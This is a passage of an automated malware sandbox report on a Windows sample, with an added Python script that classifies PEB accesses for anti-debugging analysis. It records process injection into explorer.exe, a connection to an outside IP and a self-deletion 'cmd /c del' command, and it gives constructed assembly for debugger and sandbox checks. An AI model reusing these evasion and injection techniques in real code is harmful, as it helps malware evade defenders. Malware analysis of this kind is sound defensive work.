          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010FE443 mov eax, dword ptr fs:[00000030h]3_2_010FE443
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010E245A mov eax, dword ptr fs:[00000030h]3_2_010E245A
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010B645D mov eax, dword ptr fs:[00000030h]3_2_010B645D
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0114C460 mov ecx, dword ptr fs:[00000030h]3_2_0114C460
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]3_2_010EA470
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010EA470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0117A49A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114A4B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C64AB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F44B0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C04E5 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FC700 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C0710 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F0710 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0113C730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FC720 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F273C mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01102750 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01144755 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F674D mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F674D mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114E75D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C0750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C8770 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h] (x12)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0116678E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C07AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_011747A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010CC7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_011407C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010E27ED mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114E7E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C47FB mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010D260B mov eax, dword ptr fs:[00000030h] (x7)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01102619 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0113E609 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C262C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010DE627 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F6620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F8620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010DC640 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FA660 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0118866E mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F2674 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C4690 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FC6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F66B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FA6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0113E6F2 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_011406F1 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114C912 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010B8918 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0113E908 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114892A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0115892B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01140946 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114C97C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010E6962 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01164978 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0110096E mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0110096E mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C09AD mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_011489B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_011489B3 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010D29A0 mov eax, dword ptr fs:[00000030h] (x13)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0118A9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_011569C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010CA9D0 mov eax, dword ptr fs:[00000030h] (x6)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F49D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114E9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F29F9 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114C810 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0116483A mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010E2835 mov eax, dword ptr fs:[00000030h] (x5)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010E2835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010D2840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C4859 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F0854 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01156870 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114E872 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114C89D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C0887 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010EE8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_011908C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FC8F9 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0118A8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0113EB1D mov eax, dword ptr fs:[00000030h] (x9)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010EEB20 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01188B28 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0116EB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01168B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01156B40 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0118AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01174B4B mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010BCB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01174BB0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010D0BBE mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C0BCD mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010E0BCB mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0116EBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114CBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010EEBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C8BF0 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0114CA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010EEA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FCA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010E4A35 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010D0A5B mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C6A50 mov eax, dword ptr fs:[00000030h] (x7)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FCA6F mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0113CA72 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_0116EA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010CEA80 mov eax, dword ptr fs:[00000030h] (x9)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01194A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F8A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C8AA0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01116AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010C0AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01116ACC mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F4AD0 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010FAAEE mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_01178D10 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010DAD00 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F4D1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010B6D10 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Process token adjusted: Debug (x2)
Source: C:\Windows\SysWOW64\explorer.exe  Code function: 5_2_004A79E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Memory allocated: page read and write | page guard
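Every "Code function" line above records a load of fs:[30h], which on 32-bit Windows (and in WOW64 processes such as process 3 here) is the TEB slot holding the PEB pointer. The report shows the load but not the dereference that follows it, and that second instruction is what distinguishes a debugger check (PEB.BeingDebugged, PEB.NtGlobalFlag) from import-free API resolution (PEB.Ldr) or a sandbox heuristic (PEB.NumberOfProcessors). The script below is an added example for this report, not Joe Sandbox code and not disassembly recovered from TU0kiz3mxz.exe: it tracks which registers hold the PEB pointer through a short x86 listing and names the field each later access touches, and it tallies the fs:[30h] loads per function id from report lines in the format printed above. The DEBUG_CHECK and LDR_WALK listings are constructed for illustration; the field offsets are those of the 32-bit _PEB layout.

```python
"""Classify what 32-bit x86 code does with the PEB pointer it loads from fs:[30h].
Added example for this report; not Joe Sandbox code. DEBUG_CHECK and LDR_WALK are
constructed listings, not code recovered from TU0kiz3mxz.exe."""
import re
from collections import Counter

# 32-bit _PEB field offsets (stable from Windows 7 through 11, WOW64 included)
PEB32_FIELDS = {
    0x02: "BeingDebugged",       # IsDebuggerPresent without calling the API
    0x0C: "Ldr",                 # loader module list: resolve APIs by hash, no imports
    0x10: "ProcessParameters",   # command line, image path
    0x18: "ProcessHeap",         # heap Flags/ForceFlags differ under a debugger
    0x64: "NumberOfProcessors",  # common sandbox/VM heuristic (cpu count < 2)
    0x68: "NtGlobalFlag",        # FLG_HEAP_* bits (0x70) set when debugged
    0xA4: "OSMajorVersion",
}

REG = r"(e[a-d]x|e[sd]i|ebp)"
PEB_LOAD = re.compile(rf"mov\s+{REG},\s*dword ptr fs:\[0*30h\]", re.I)
# memory operand relative to a register: [ecx], [eax+2h], [esi+0Ch], [eax+0x10]
DEREF = re.compile(rf"\[{REG}(?:\+(?:0x)?([0-9a-f]+)h?)?\]", re.I)
# sandbox report line: 'Code function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]'
REPORT_LINE = re.compile(rf"Code function:\s*(\d+_\d+_[0-9A-F]+)\s+mov\s+{REG},\s*dword ptr fs:\[0*30h\]", re.I)
# instructions that overwrite their first operand
WRITES_DST = {"mov", "movzx", "movsx", "lea", "pop", "xor", "and", "or", "add", "sub", "shl", "shr"}

def _parse(line):
    """'movzx eax, byte ptr [eax+2h] ; note' -> ('movzx', ['eax', 'byte ptr [eax+2h]'])"""
    text = line.split(";", 1)[0].strip()
    if not text:
        return None, []
    mnem, _, rest = text.partition(" ")
    ops = [o.strip() for o in rest.split(",")] if rest.strip() else []
    return mnem.lower(), ops

def classify_peb_uses(asm_lines):
    """Follow registers that hold the PEB pointer and name the PEB field each
    later dereference touches. Returns [(line_no, field_name), ...]."""
    peb_regs, hits = set(), []
    for no, line in enumerate(asm_lines, 1):
        mnem, ops = _parse(line)
        if mnem is None:
            continue
        if PEB_LOAD.search(line):
            peb_regs.add(ops[0].lower())
            continue
        for op in ops:
            d = DEREF.search(op)
            if d and d.group(1).lower() in peb_regs:
                off = int(d.group(2), 16) if d.group(2) else 0
                hits.append((no, PEB32_FIELDS.get(off, f"PEB+0x{off:X}")))
        # once the register is overwritten it no longer points at the PEB
        if mnem in WRITES_DST and ops and ops[0].lower() in peb_regs:
            peb_regs.discard(ops[0].lower())
    return hits

def count_peb_loads(report_lines):
    """Count fs:[30h] loads per function id in 'Code function' report lines."""
    counts = Counter()
    for line in report_lines:
        m = REPORT_LINE.search(line)
        if m:
            counts[m.group(1).upper()] += 1
    return counts

# Constructed listing: the two classic debugger checks behind an fs:[30h] load
DEBUG_CHECK = [
    "mov eax, dword ptr fs:[00000030h]",
    "movzx eax, byte ptr [eax+2h]      ; PEB->BeingDebugged",
    "test eax, eax",
    "jne short bail",
    "mov ecx, dword ptr fs:[00000030h]",
    "mov ecx, dword ptr [ecx+68h]      ; PEB->NtGlobalFlag",
    "and ecx, 70h",
    "jne short bail",
]
# Constructed listing: loader walk (API resolution) plus a CPU-count VM check
LDR_WALK = [
    "mov esi, dword ptr fs:[00000030h]",
    "mov esi, dword ptr [esi+0Ch]      ; PEB->Ldr",
    "mov esi, dword ptr [esi+14h]      ; Ldr->InMemoryOrderModuleList.Flink (not a PEB field)",
    "mov eax, dword ptr fs:[00000030h]",
    "mov eax, dword ptr [eax+64h]      ; PEB->NumberOfProcessors",
    "cmp eax, 2",
]
# Lines copied from this report (process 3), with the column separator restored
REPORT_SAMPLE = [
    r"Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010D0770 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F273C mov ecx, dword ptr fs:[00000030h]",
    r"Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Code function: 3_2_010F44B0 mov ecx, dword ptr fs:[00000030h]",
]

if __name__ == "__main__":
    for name, asm in (("DEBUG_CHECK", DEBUG_CHECK), ("LDR_WALK", LDR_WALK)):
        print(name, classify_peb_uses(asm))
    print(count_peb_loads(REPORT_SAMPLE).most_common())
```

The register tracking is deliberately conservative: after `mov esi, [esi+0Ch]` the register holds Ldr, not the PEB, so the following `[esi+14h]` is not reported as a PEB field. When a function such as 3_2_010D29A0 reloads fs:[30h] thirteen times, the same classifier run over its real disassembly tells you whether that is thirteen debugger checks or an API-hashing loop reading Ldr.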

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe  Network Connect: 13.248.169.48 80
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  NtClose: Indirect: 0x107A56C
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  NtQueueApcThread: Indirect: 0x107A4F2
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write (x2)
Source: C:\Windows\SysWOW64\explorer.exe  Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\explorer.exe  Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Thread register set: target process: 2580
Source: C:\Windows\SysWOW64\explorer.exe  Thread register set: target process: 2580
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 3C0000
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe  Process created: C:\Users\user\Desktop\TU0kiz3mxz.exe "C:\Users\user\Desktop\TU0kiz3mxz.exe" (x2)
Source: C:\Windows\SysWOW64\explorer.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TU0kiz3mxz.exe"
Source: explorer.exe, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000003.2638760347.0000000004F04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2663839903.0000000004EF7000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
Source: explorer.exe, explorer.exe, 0000000F.00000003.2638760347.0000000004F04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2663839903.0000000004EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2643856571.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Progman
Source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp  Binary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
Source: explorer.exe, 00000004.00000002.2625555299.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707105236.0000000001240000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: 1Progman$
Source: explorer.exe, 00000004.00000000.1707824873.00000000018A0000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.1707824873.00000000018A0000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: }Program Manager
Source: explorer.exe, 0000000F.00000002.4153825583.00000000010E0000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Progmans
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Users\user\Desktop\TU0kiz3mxz.exe VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
